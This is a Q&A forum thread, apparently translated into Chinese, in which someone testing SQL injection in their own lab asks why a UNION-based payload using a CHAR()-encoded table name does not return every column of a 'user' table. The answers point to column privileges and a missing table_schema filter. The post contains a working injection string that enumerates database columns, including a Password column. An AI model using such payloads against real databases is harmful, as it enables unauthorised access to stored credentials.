0

我正在研究一些用于个人教育的 SQLi,但我一直遇到同样的问题。

当我使用以下注入时

bla' union all select '1', group_concat(column_name),'3','4' FROM information_schema.columns WHERE table_name= CHAR(117, 115, 101,114) #

我得到了一个名为 user -> 的表的所有列名

Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routin

因为这是我自己的受控环境,所以我知道该表包含一个名为 UserName 的列。为什么它没有与列结果一起列出?

4

2 回答 2

0

That should work. You might check that the account which is executing the query has access to the column UserName. http://dev.mysql.com/doc/refman/5.0/en/information-schema.html Suggests that you will only see columns which you have access to.

于 2012-10-25T14:07:51.323 回答
0

回答:有不止一个表叫做 user,我没有指定在什么 table_scheme 中搜索

于 2012-10-25T14:25:11.043 回答